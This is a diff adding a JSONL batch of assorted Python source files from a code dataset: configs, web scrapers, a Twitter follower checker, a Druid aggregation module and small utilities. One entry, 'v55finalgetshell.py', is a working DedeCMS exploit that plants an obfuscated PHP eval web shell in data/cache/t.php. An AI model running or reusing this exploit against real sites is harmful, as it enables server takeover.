diff --git "a/6487.jsonl" "b/6487.jsonl" new file mode 100644--- /dev/null +++ "b/6487.jsonl" @@ -0,0 +1,732 @@ +{"seq_id":"333208825","text":"import os\n\nfrom pathlib import Path\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n\nclass Config(dict):\n\n def __init__(self, defaults=None):\n dict.__init__(self, defaults or {})\n\n def from_object(self, obj):\n for key in dir(obj):\n if key.isupper():\n self[key] = getattr(obj, key)\n\n\nclass BaseConfig:\n DEBUG = False\n\n LOG_ROOT = str(Path(os.path.dirname(__file__)).parent)\n LOG_ROOT = os.path.join(LOG_ROOT, 'logs')\n\n LOGGING_CONFIG = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'INFO',\n },\n }\n }\n\n GITHUB_ORG = 'fyndiq'\n GITHUB_REPO = 'fyndiq'\n GITHUB_USERNAME = os.environ.get('GITHUB_USERNAME')\n GITHUB_PASSWORD = os.environ.get('GITHUB_PASSWORD')\n\n PUBSUB_CHANNELS = [\n ('get_rfr_issues', 'callbacks.process_get_rfr_issues'),\n ]\n\n SLACK_DEFAULT_CHANNEL = 'testroom'\n SLACK_BOT_NAME = 'boom'\n\n\nclass DevConfig(BaseConfig):\n DEBUG = True\n\nconfigs = {\n 'default': BaseConfig,\n 'dev': DevConfig,\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"491834675","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 9 12:39:58 2020\r\n\r\n@author: Stephen Sigrist\r\n\"\"\"\r\nimport os\r\nos.chdir(\"..\")\r\n\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom pandasql import sqldf\r\n\r\n# 1: Create Daily Ticker dataframe\r\n#1a: add company name to ticker list\r\ntickers_data = pd.read_csv(\"input files\\\\capstone\\\\capstone_constituents.csv\", index_col=False)\r\n\r\ndef get_symbol(symbol):\r\n url = \"http://d.yimg.com/autoc.finance.yahoo.com/autoc?query={}®ion=1&lang=en\".format(symbol)\r\n\r\n result = requests.get(url).json()\r\n\r\n for x in result['ResultSet']['Result']:\r\n if x['symbol'] == symbol:\r\n return x['name']\r\n\r\ntickers_data['company_name']=tickers_data.ticker.apply(get_symbol)\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('[^\\w\\s]','')\r\ntickers_data['merge_key']=1\r\ntickers_data['company_name']=tickers_data['company_name'].str.upper() \r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('INCORPORATED', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('INC', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('COMPANY', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('CORPORATION', '')\r\ntickers_data['company_name']=tickers_data['company_name'].str.replace('CORP', '')\r\ntickers_data['name_word_count']=tickers_data['company_name'].str.count(' ') \r\n\r\n#1b: expand to daily\r\ndays= pd.date_range(start='1/1/2010',end='12/31/2020', freq='D',name='datetime')\r\ndays_df=pd.DataFrame({ 'dt': days })\r\ndays_df['date']=days_df['dt'].dt.date\r\ndays_df['merge_key']=1\r\ndel days_df['dt']\r\ndays_df['string_date']=pd.to_datetime(days_df['date']).\\\r\ndt.strftime(\"%Y-%m-%d\").replace(\"NaT\", 
\"\")\r\ndays_df['str_year']=pd.DatetimeIndex(days_df['date']).year.astype(str)\r\ndays_df['str_month']=pd.DatetimeIndex(days_df['date']).month.astype(str)\r\ndays_df['str_day']=pd.DatetimeIndex(days_df['date']).day.astype(str)\r\n \r\n\r\n\r\nlong_daily_df=pd.merge(tickers_data, days_df, on='merge_key')\r\nlong_daily_df['query']=long_daily_df[\"ticker\"] + \" + \"+ long_daily_df['company_name']+\" on:\"+\\\r\nlong_daily_df[\"str_year\"]+\"-\"+long_daily_df[\"str_month\"]+\"-\"+long_daily_df[\"str_day\"]\r\nprint(long_daily_df['query'][0])\r\n\r\nUSER_AGENT = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \\\r\nChrome/80.0.3987.163 Safari/537.36\"\r\n\r\nmaster_results_df= pd.DataFrame(columns=['query', 'ticker', 'date',\\\r\n'str_year', 'str_month', 'str_day','title', 'link'])\r\n \r\n#long daily df saved 2-12 1-11\r\n#long_daily_df.to_csv(\"constructed\\\\capstone\\\\temp_save_long_daily_df_trhough RGN_12.csv\", sep=',')\r\n#test=long_daily_df[21165:]\r\n\r\nfor a in range(len(long_daily_df)):\r\n query =long_daily_df['query'][a]\r\n print(query)\r\n\r\n URL = f\"https://google.com/search?q={query}\"\r\n headers = {\"user-agent\" : USER_AGENT}\r\n resp = requests.get(URL, headers=headers)\r\n x=resp.status_code\r\n if resp.status_code == 200:\r\n soup = BeautifulSoup(resp.content, \"html.parser\")\r\n \r\n results = []\r\n for g in soup.find_all('div', class_='r'):\r\n anchors = g.find_all('a')\r\n if anchors:\r\n link = anchors[0]['href']\r\n title = g.find('h3').text\r\n item = {\r\n \"title\": title,\r\n \"link\": link\r\n }\r\n results.append(item)\r\n temp_results_df=pd.DataFrame(results)\r\n temp_results_df['query']=query\r\n temp_results_df['date']=long_daily_df['date'][a]\r\n temp_results_df['ticker']=long_daily_df['ticker'][a]\r\n temp_results_df['str_year']=long_daily_df['str_year'][a]\r\n temp_results_df['str_month']=long_daily_df['str_month'][a]\r\n temp_results_df['str_day']=long_daily_df['str_day'][a]\r\n master_results_df=master_results_df.append(temp_results_df)\r\n\r\n\r\n\r\n#Parse link for dates\r\n#master_results_df['link_contains_year']=master_results_df.\\\r\n#apply(lambda row: row.str_year in row.link, axis=1)\r\nmaster_results_df['str_month']=master_results_df['str_month'].str.zfill(2)\r\nmaster_results_df['str_day']=master_results_df['str_day'].str.zfill(2)\r\nmaster_results_df['str_yrmon']=master_results_df.str_year+\"/\"+master_results_df.str_month\r\n\r\nmaster_results_df['link_contains_yrmon']=master_results_df.\\\r\napply(lambda row: row.str_year in row.link, axis=1)\r\n\r\nsubset_df=master_results_df[master_results_df['link_contains_yrmon']==True]\r\nsubset_df=subset_df[['query', 'ticker', 'date', 'link_contains_yrmon','link']]\r\n\r\nsubset_df['key_news']=subset_df['link'].str.contains(\"nytimes\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"nytimes\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"wsj\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"bloomberg\")\r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"ft.com\") \r\nsubset_df['key_news']=subset_df['key_news']+subset_df['link'].str.contains(\"seekingalpha\") \r\nsubset_df=subset_df[subset_df['key_news']>0]\r\n\r\nsentiment_df=pd.read_csv(\"input 
files\\\\capstone\\\\capstone_sentiment.csv\")\r\n#tosave=subset_df\r\n#subset_df=tosave\r\nsubset_df=subset_df.reset_index(drop=True)\r\nsubset_df['gs_poswords']=0\r\nsubset_df['gs_negwords']=0\r\n\r\nfor a in range(len(subset_df)):\r\n\r\n URL =subset_df.iloc[a, 4]\r\n temp_link=subset_df.iloc[a, 4]\r\n temp_df=pd.DataFrame([[temp_link]], columns=list('x'))\r\n temp_df['link']=temp_df['x']\r\n temp_df=temp_df.drop(columns=['x'])\r\n #print(URL)\r\n try:\r\n headers = {\"user-agent\" : USER_AGENT}\r\n resp = requests.get(URL, headers=headers)\r\n temp_text = resp.text\r\n temp_pos=0\r\n temp_neg=0\r\n \r\n for k in range(len(sentiment_df)):\r\n temp_df[f\"w_{k}\"]=temp_text.upper().count(sentiment_df['word'][k])\r\n \r\n for i in range(0, 1637):\r\n temp_pos=int(temp_pos)+temp_df[f\"w_{i}\"]\r\n\r\n for j in range(1637, 3928):\r\n temp_neg=int(temp_neg)+temp_df[f\"w_{j}\"]\r\n \r\n subset_df.iloc[a,6]=int(temp_pos)\r\n subset_df.iloc[a,7]=int(temp_neg)\r\n \r\n temp_pos=0\r\n temp_neg=0\r\n temp_text=\"\"\r\n \r\n except:\r\n print(\"NULL\")\r\n\r\n\r\n#aggregate to Monthly\r\nsubset_df['year']=pd.DatetimeIndex(subset_df['date']).year\r\nsubset_df['month']=pd.DatetimeIndex(subset_df['date']).month\r\npysqldf = lambda q: sqldf(q, globals())\r\nq = \"\"\"\r\nSELECT DISTINCT\r\nticker, year, month, \r\nSUM(gs_poswords) as gs_poswords,\r\nSUM(gs_negwords) as gs_negwords\r\nFROM\r\nsubset_df\r\nGROUP BY\r\nticker, year, month\r\nORDER BY\r\nticker, year, month\r\n\"\"\"\r\nagg_mthly_df= pysqldf(q)\r\n \r\nagg_mthly_df.to_csv(\"constructed\\\\capstone\\\\google_scrape_mthly.csv\", sep=',')\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"python/capstone/3. Capstone Scrape Google.py","file_name":"3. Capstone Scrape Google.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223918837","text":"import requests\nfrom termcolor import cprint\n\n\nclass final_getshell:\n\n def __init__(self,url):\n self.url = url\n\n def checktrace(self):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr\"\\\n \"(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr\"\\\n \"(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)\"\\\n \".chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(9\"\\\n \"5).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41)\"\\\n \".chr(59).chr(63).chr(62));/*\"\n payload2 = \"needCode=aa/../../../data/mysql_error_trace\"\n payload3 = \"data/cache/t.php\"\n if '://' not in self.url:\n self.url = 'http://' + self.url + '/'\n url = self.url\n vulnurl = url + payload\n\n try:\n r = requests.get(url=vulnurl,headers=headers)\n if r.status_code == 200 :\n m = requests.post(url=url+'plus/comments_frame.php',data=payload2,headers=headers)\n if m.status_code == 200:\n s = requests.get(url=url+payload3,headers=headers)\n if s.status_code == 200:\n cprint(\"target may be getshell:\" + url + payload3, \"red\")\n\n except:\n return False","sub_path":"script/v55finalgetshell.py","file_name":"v55finalgetshell.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"577734923","text":"# coding=utf-8\nfrom 
tweepy import TweepError\n\nfrom pychroner import PluginMeta, PluginType\n\n\ndef getAllFollow(api):\n t = []\n cursor = -1\n while cursor != 0:\n r = api.friends(count=200, cursor=cursor)\n t += [x._json for x in r[0]]\n if cursor != -1:\n break\n cursor = r[1][1]\n return t\n\ndef getAllFollower(api):\n t = []\n cursor = -1\n while cursor != 0:\n r = api.followers(count=200, cursor=cursor)\n t += [x._json for x in r[0]]\n if cursor != -1:\n break\n cursor = r[1][1]\n return t\n\n@PluginMeta(PluginType.Schedule, twitterAccount=\"SlashNephy\", multipleMinute=5)\ndef do(pluginApi):\n api = pluginApi.getTwitterAccount().getTweepyHandler()\n db = pluginApi.getMongoDB().getCollection(\"bot\")\n\n follow = getAllFollow(api)\n follower = getAllFollower(api)\n\n text = []\n for userId in ({x[\"id\"] for x in db.follower.find()} - {x[\"id\"] for x in follower}):\n try:\n data = api.get_user(user_id=userId)\n except TweepError as e:\n if e.api_code == 50:\n text.append(f\"@{db.follower.find_one({'id': userId})['screen_name']} が垢消ししました.\")\n elif e.api_code == 63:\n text.append(f\"@{db.follower.find_one({'id': userId})['screen_name']} が凍結されました.\")\n continue\n\n if data.followers_count == 0 and data.friends_count == 0:\n text.append(f\"@{data.screen_name} がアカウントロックされました.\")\n\n if data.screen_name in [\"falcon_lunch\", \"comic_cune\"]:\n continue\n\n data2 = api.show_friendship(target_id=userId)[0]\n\n if data2.blocked_by:\n text.append(f\"@{data.screen_name} にブロックされました.\")\n elif data2.blocking:\n text.append(f\"@{data.screen_name} をブロックしました.\")\n else:\n text.append(\n f\"@{data.screen_name} にリムーブされました. 現在, {'片思い' if data2.following else 'FF関係消滅'}中です.\"\n f\"(フォロワー数 {data.followers_count} / フォロー数 {data.friends_count} / FF比 {round(data.followers_count / data.friends_count, 3) if data.friends_count != 0 else data.followers_count})\"\n )\n\n # フォローとフォロワーを更新\n db.follow.remove()\n db.follow.insert_many(follow)\n db.follower.remove()\n db.follower.insert_many(follower)\n\n if text:\n pluginApi.getSlack().post(\n channel=\"#ff-checker\",\n username=\"Twitter FF Checker\",\n text=\"\\n\\n\".join(text)\n )\n","sub_path":"plugins/SlashNephy/AccountChecker.py","file_name":"AccountChecker.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"277336326","text":"\n# write dictionary to file and print file data after reading\ncolorDic = {1: 'Red', 2: 'Blue', 3: 'Green'} \nfilename= 'abc.txt'\n\ntry: \n fileHandler = open(filename, 'wt') \n fileHandler.write(str(colorDic)) \n fileHandler.close() \n \nexcept: \n print(\"Unable to write to file\")\n\ncontent = open(filename)\nprint(content.read())\n","sub_path":"File_IO.py","file_name":"File_IO.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192956439","text":"# 数字转为千分位\r\ndef convert_str_contain_comma_v2(num):\r\n if num == '-':\r\n return num\r\n split_num = str(num).split('.')\r\n int_part = split_num[0]\r\n decimal_part = '.' 
+ split_num[1] if len(split_num) > 1 else ''\r\n\r\n result = ''\r\n count = 0\r\n for i in int_part[::-1]:\r\n count += 1\r\n result += i\r\n if count % 3 == 0:\r\n result += ','\r\n return result[::-1].strip(',') + decimal_part\r\n\r\n\r\n","sub_path":"settlements/report/convert_str_contain_comma_v2.py","file_name":"convert_str_contain_comma_v2.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"413610769","text":"from builtins import object\nimport math\nimport os\nfrom datetime import datetime\nfrom collections import defaultdict\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nfrom flask import request, current_app\n\nfrom pydruid.utils.filters import Dimension\n\nfrom config.system import STANDARD_DATA_DATE_FORMAT\nfrom db.druid.query_builder import GroupByQueryBuilder\nfrom db.druid.util import build_time_interval, EmptyFilter\nfrom log import LOG\nfrom web.server.environment import IS_PRODUCTION\nfrom web.server.routes.views.series_statistics import fill_stats\nfrom web.server.util.util import Error, Success\n\nUSE_THREAD_POOL = False\n\n# Set to true for demos that should not display sensitive health information.\nUSE_RANDOMIZED_DATA = False\n\n# Geo field selection of 'nation' will be treated as a special case.\nNATION_GEO_FIELD = 'nation'\n\nDEFAULT_TIME_BUCKET = 'month'\n\nDEFAULT_GRANULARITIES = ['month', 'all']\n\n\nclass GeoTimeAggregator(object):\n '''\n Aggregates by geography and time.\n '''\n\n def __init__(self, query_client, geo_field_ordering):\n self.geo_field = None\n self.denom = None\n self.location_filters = []\n self.non_hierarchical_filter = EmptyFilter()\n self.data_fields = set()\n self.calculated_fields = {}\n self.ordered_fields = []\n self.latitude_field = None\n self.longitude_field = None\n self.start_date = None\n self.end_date = None\n self.selected_granularities = DEFAULT_GRANULARITIES\n self.time_bucket = None\n\n self.request_data = None\n self.request_is_demo = False\n self.use_randomized_data = False\n\n self.calculation = None\n self.druid_slice_dimensions = []\n self.druid_geo_dimensions = []\n self.batches = None\n self.response = None\n self.query_client = query_client\n self.all_geo_dimensions = set(geo_field_ordering)\n\n # Initialize basic structure of result\n self.results = {\n # Aggregate stats.\n 'overall': {\n 'totals': defaultdict(int),\n 'median': defaultdict(int),\n 'first_quartile': defaultdict(int),\n 'third_quartile': defaultdict(int),\n 'mean': defaultdict(int),\n 'std': defaultdict(int),\n 'variance': defaultdict(int),\n 'min': defaultdict(int),\n 'max': defaultdict(int),\n 'num_nonzero': defaultdict(int),\n },\n # Geo-level stats.\n 'byGeo': {},\n }\n\n def get_response(self):\n return self.response\n\n def run(self, request_data=None):\n if request_data is None:\n self.request_data = request.get_json(force=True)\n else:\n self.request_data = request_data\n\n result = all(\n f()\n for f in [\n self.parse_arguments,\n self.run_query,\n self.process_batches,\n self.postprocess_results,\n ]\n )\n if not result and self.response is None:\n self.response = Error('Sorry, an unhandled error has occurred.')\n\n def parse_arguments(self):\n self.request_is_demo = self.request_data.get('demo')\n\n # Parse overall modifiers.\n self.use_randomized_data = USE_RANDOMIZED_DATA or self.request_is_demo\n\n # Location filters are default OR.\n # TODO(stephen, ian): When needed, allow more complex filtering\n filters = 
self.request_data.get('filters', [])\n for f in filters:\n if not len(list(f.keys())):\n # Skip empty filters.\n continue\n\n # HACK(stephen): Handle both hierarchical dimension filters (which\n # should be OR'd together) and non-hierarchical dimensions (which\n # should all be AND'd together) with the location filters\n first_key = list(f.keys())[0]\n if len(f) == 1 and first_key not in self.all_geo_dimensions:\n self.non_hierarchical_filter &= (\n Dimension(first_key) == list(f.values())[0]\n )\n continue\n\n location_filter = {}\n # Validate that the dimensions being filtered on actually exist\n for key, value in list(f.items()):\n # NOTE(stephen): This should never happen\n if key not in self.all_geo_dimensions:\n LOG.warn(\n 'A location filter contains non-location columns to '\n 'filter by. Filter: %s',\n f,\n )\n location_filter[key] = value\n if location_filter:\n self.location_filters.append(location_filter)\n\n geo_granularity = self.request_data.get('granularity')\n if geo_granularity != NATION_GEO_FIELD:\n latlng_fields = current_app.zen_config.aggregation.GEO_TO_LATLNG_FIELD.get(\n geo_granularity\n )\n if latlng_fields:\n self.latitude_field = latlng_fields[0]\n self.longitude_field = latlng_fields[1]\n self.geo_field = geo_granularity\n\n # Capture requested fields\n request_fields = self.request_data.get('fields', [])\n\n # Parse denominator\n denom = self.request_data.get('denominator')\n if denom:\n if denom in current_app.zen_config.indicators.VALID_FIELDS:\n self.denom = denom\n request_fields.append(denom)\n else:\n error_msg = 'Invalid denominator specified: %s' % denom\n self.response = Error(error_msg)\n return False\n\n # Deduplicate field list while maintaining the user's selected order\n # since the frontend has implicit requirements around field ordering\n for field in request_fields:\n self.data_fields.add(field)\n\n # TODO(stephen): Is this even necessary? Can the frontend send\n # duplicate fields? Also, would love an ordered set here instead\n # of searching the list.\n if field not in self.ordered_fields:\n self.ordered_fields.append(field)\n\n bad_fields = self.data_fields - current_app.zen_config.indicators.VALID_FIELDS\n if bad_fields:\n error_msg = 'Invalid fields specified: %s' % ', '.join(bad_fields)\n self.response = Error(error_msg)\n return False\n\n self.selected_granularities = self.request_data.get(\n 'granularities', DEFAULT_GRANULARITIES\n )\n\n self.calculation = current_app.zen_config.aggregation_rules.get_calculation_for_fields(\n self.data_fields\n )\n self.calculation.set_strict_null_fields(self.data_fields)\n\n # Get dates\n # TODO(stephen, ian): Validate these\n self.start_date = datetime.strptime(\n self.request_data.get('start_date'), STANDARD_DATA_DATE_FORMAT\n ).date()\n self.end_date = datetime.strptime(\n self.request_data.get('end_date'), STANDARD_DATA_DATE_FORMAT\n ).date()\n self.time_bucket = self.request_data.get('time_bucket', DEFAULT_TIME_BUCKET)\n return True\n\n def run_query(self):\n '''\n Constructs and runs the Druid request for this query. The query is\n blocking.\n '''\n\n LOG.info('Running query...')\n\n # Filter the dimensions using the location filters passed in\n dimension_filter = GroupByQueryBuilder.build_dimension_filter(\n self.location_filters\n )\n\n # AND the selected locations with the non-location filters requested\n dimension_filter &= self.non_hierarchical_filter\n\n # Slice by selected granularity + all fields less specific than it. 
For\n # example, if user makes a Woreda query, we also want to slice by Zone\n # and Region.\n if self.geo_field:\n # Restrict query to non-null for the given geo\n dimension_filter &= Dimension(self.geo_field) != ''\n\n # Set the appropriate dimensions for this query\n self.druid_slice_dimensions = self.get_slice_dimensions()\n if self.latitude_field and self.longitude_field:\n self.druid_geo_dimensions = [self.latitude_field, self.longitude_field]\n\n grouping_fields = self.druid_slice_dimensions + self.druid_geo_dimensions\n\n batches = []\n overall_interval = build_time_interval(self.start_date, self.end_date)\n for selected_granularity in self.selected_granularities:\n granularity = selected_granularity\n intervals = [overall_interval] # Druid expects time intervals as\n # a list\n granularity = current_app.zen_config.aggregation_rules.get_granularity_for_interval(\n selected_granularity, self.start_date, self.end_date\n )\n\n query = GroupByQueryBuilder(\n datasource=current_app.druid_context.current_datasource.name,\n granularity=granularity,\n grouping_fields=grouping_fields,\n intervals=intervals,\n calculation=self.calculation,\n dimension_filter=dimension_filter,\n )\n\n batch = QueryBatch(\n query,\n selected_granularity,\n self.geo_field,\n self.latitude_field,\n self.longitude_field,\n self.ordered_fields,\n self.denom,\n self.druid_slice_dimensions,\n self.query_client,\n )\n batches.append(batch)\n\n num_granularities = len(self.selected_granularities)\n if USE_THREAD_POOL and num_granularities > 1:\n pool = ThreadPool(num_granularities)\n pool.map(QueryBatch.run, batches)\n pool.close()\n pool.join()\n else:\n _ = [batch.run() for batch in batches]\n\n self.batches = batches\n return True\n\n def process_batches(self):\n '''\n Pack results from Druid into our format.\n '''\n\n LOG.info('Processing batches...')\n\n geo_results = self.results['byGeo']\n\n batch_warnings = []\n for batch in self.batches:\n for geo_key, geo_result in list(batch.result.items()):\n if geo_result.has_data():\n if geo_key not in geo_results:\n geo_results[geo_key] = GeoResult(geo_result.metadata)\n geo_results[geo_key].data.update(geo_result.data)\n batch_warnings.extend(geo_results[geo_key].warnings)\n\n if len(batch_warnings):\n LOG.warn('!! You overwrote existing data. Run in dev for detailed debug.')\n if not IS_PRODUCTION:\n # Only show these errors in dev. In production, these outputs\n # can overwhelm slow disks.\n print('\\n'.join(batch_warnings))\n\n return True\n\n def postprocess_results(self):\n LOG.info('Postprocessing results...')\n self.fill_metadata_and_stats()\n\n # Tell the frontend which fields we are returning.\n if self.denom:\n self.results['fieldsToDisplay'] = [\n x for x in self.ordered_fields if x != self.denom\n ]\n else:\n self.results['fieldsToDisplay'] = self.ordered_fields\n\n # Final json response.\n self.response = Success(self.results)\n return True\n\n def fill_metadata_and_stats(self):\n '''\n Compute 'overall' metadata\n '''\n # We only want to compute metadata if the 'all' granularity was\n # selected.\n if 'all' not in self.selected_granularities:\n return\n\n # Done grabbing field data, now set up stats.\n field_to_values = defaultdict(list)\n for geo_result in list(self.results['byGeo'].values()):\n # The \"all\" granularity will contain the total values needed for\n # stats computation. 
The data series will only contain a single\n # date which all data will be rolled up into.\n # HACK(stephen): Work around bug where some geo results do not have\n # \"all\" data set.\n if 'all' not in geo_result.data:\n continue\n\n for field, value in list(list(geo_result.data['all'].values())[0].items()):\n # 1) Create map from field to list of values, used for stats\n # later.\n field_to_values[field].append(value)\n\n # Done with denominators, now compute statistics.\n fill_stats(self.results['overall'], field_to_values)\n\n def get_slice_dimensions(self):\n return current_app.zen_config.aggregation.DIMENSION_SLICES.get(\n self.geo_field, [self.geo_field]\n )\n\n\nclass QueryBatch(object): # pylint: disable=too-few-public-methods\n def __init__(\n self,\n druid_query,\n granularity,\n geo_field,\n lat_field,\n lon_field,\n ordered_fields,\n denom,\n druid_slice_dimensions,\n query_client,\n ):\n self.druid_query = druid_query\n self.granularity = granularity\n self.geo_field = geo_field\n self.lat_field = lat_field\n self.lon_field = lon_field\n self.ordered_fields = ordered_fields\n self.denom = denom\n self.druid_slice_dimensions = druid_slice_dimensions\n self.query_client = query_client\n self.query_result = {}\n self.result = None\n\n def run(self):\n LOG.debug('Starting: %s', self.granularity)\n self.query_result = self.query_client.run_query(self.druid_query)\n\n LOG.debug('Query completed: %s', self.granularity)\n self.result = self._process_query_result()\n\n LOG.debug('Finished: %s', self.granularity)\n\n def _process_query_result(self):\n output = {}\n for row in self.query_result:\n # TODO(stephen): Handle optimized queries changing from groupby\n # to timeseries better (the results are stored in a different field)\n event = row.get('event', row.get('result'))\n geo_key = '__'.join(\n [event.get(d) or '' for d in self.druid_slice_dimensions]\n )\n if geo_key not in output:\n metadata = self._build_metadata_for_event(event)\n output[geo_key] = GeoResult(\n metadata, self.granularity, self.ordered_fields, self.denom\n )\n output[geo_key].process_event(event, row['timestamp'])\n return output\n\n def _build_metadata_for_event(self, event):\n output = {\n # Special case for national level searches since this is not\n # stored as a dimension in the database\n 'name': event[self.geo_field]\n if self.geo_field\n else current_app.zen_config.general.NATION_NAME,\n 'lat': event.get(self.lat_field),\n 'lng': event.get(self.lon_field),\n }\n\n for dim in self.druid_slice_dimensions:\n output[dim] = event[dim]\n\n return output\n\n\nclass GeoResult(dict):\n def __init__(self, metadata, granularity=None, data_fields=None, denom_field=None):\n super(GeoResult, self).__init__()\n self.metadata = metadata\n self.data = {}\n self.warnings = []\n\n if granularity:\n self.data[granularity] = defaultdict(lambda: defaultdict(float))\n self._granularity = granularity\n self._data_fields = data_fields\n self._denom_field = denom_field\n\n def process_event(self, event, timestamp):\n for field in self._data_fields:\n field_value = event[field]\n\n if self._should_skip_field(field, field_value):\n continue\n\n # Apply denominator if it exists\n if self._denom_field:\n denom_value = event.get(self._denom_field) or 0.0\n if denom_value == 0:\n # TODO(ian, stephen): Should there be some time of warning\n # displayed to the user?\n field_value = 0\n else:\n field_value /= denom_value\n cur_result = self.data[self._granularity][timestamp]\n if field in cur_result:\n self.warnings.append(\n 'You overwrote 
existing data for '\n '%s, %s with event \\'%s\\' but it already has \\'%s\\'.'\n % (self._granularity, field, event, cur_result)\n )\n # TODO(ian): Temporary hack on 11/3/2016 to hide the fact that we\n # don't aggregate correctly on data that isn't normalized or is\n # grouped by differeing latlng.\n if os.environ.get('ZEN_ENV').lower() is 'za':\n cur_result[field] += field_value\n else:\n cur_result[field] = field_value\n\n def has_data(self):\n for series in list(self.data.values()):\n if series:\n return True\n return False\n\n def _should_skip_field(self, field, value):\n # Don't store the denominator as a separate value in the results.\n if field is self._denom_field:\n return True\n\n # Sometimes null, NaN, Infinity, -Infinity can be returned for a\n # field's value from druid.\n if value is None or math.isnan(value) or math.isinf(value):\n return True\n\n return False\n\n @property\n def metadata(self):\n return self['metadata']\n\n @metadata.setter\n def metadata(self, data):\n self['metadata'] = data\n\n @property\n def data(self):\n return self['data']\n\n @data.setter\n def data(self, data):\n self['data'] = data\n","sub_path":"web/server/routes/views/geo_time_aggregator.py","file_name":"geo_time_aggregator.py","file_ext":"py","file_size_in_byte":17936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"2438403","text":"import requests\nimport ujson\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nfrom src.io import write\nfrom src import settings\nfrom .scrape_games_output import ScrapeGamesOutput, ScrapeGamesPathParams\n\ndomain = 'https://understat.com'\n\n\ndef handler(event=None, context=None):\n\thome_soup = BeautifulSoup(requests.get(domain).text, 'html.parser')\n\tleagues = [\n\t\t{'name': a.text, 'url': '%s/%s' % (domain, a['href'])} for a in\n\t\thome_soup.find('header', {'id': 'header'}).find('nav', {'class': 'm-navigation'}).find_all('a')\n\t]\n\tleague_season_tuples = []\n\tfor league in tqdm(leagues):\n\t\tleague_soup = BeautifulSoup(requests.get(league['url']).text, 'html.parser')\n\t\tseasons = [int(o['value']) for o in league_soup.find('select', {'name': 'season'}).find_all('option')]\n\t\tmin_season_to_scrape = settings.get_min_season_to_scrape()\n\t\tseasons = [s for s in seasons if s >= min_season_to_scrape]\n\t\tleague_season_tuples.extend((league['name'], season) for season in seasons)\n\n\tfor league, season in tqdm(league_season_tuples):\n\t\tgames = ujson.loads(\n\t\t\trequests.get('%s/league/%s/%s' % (domain, league.replace(' ', '_'), season)).text\n\t\t\t\t.split('var datesData')[1]\n\t\t\t\t.split('')[0]\n\t\t\t\t.split('JSON.parse(\\'')[-1]\n\t\t\t\t.split('\\')')[0]\n\t\t\t\t.encode('utf8').decode('unicode_escape')\n\t\t)\n\t\tfor game in games:\n\t\t\tgame['league'] = league\n\t\t\tgame['season'] = season\n\t\twrite(ScrapeGamesOutput(), ScrapeGamesPathParams(league, season), games)\n\n\nif __name__ == '__main__':\n\thandler()\n","sub_path":"src/process/scrape/games/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"456372809","text":"import pika\nimport json\n\n\n\ndef sendMessage(message):\n \n connection = pika.BlockingConnection(pika.ConnectionParameters('example-rabbit', 5672, 'example_vhost'))\n channel = connection.channel()\n \n channel.queue_declare(queue='example')\n\n jsonMessage = json.dumps(message)\n channel.basic_publish(exchange='', 
routing_key='example', body=jsonMessage)\n\n channel.close()\n connection.close()\n\n return \"Message sent! Payload:
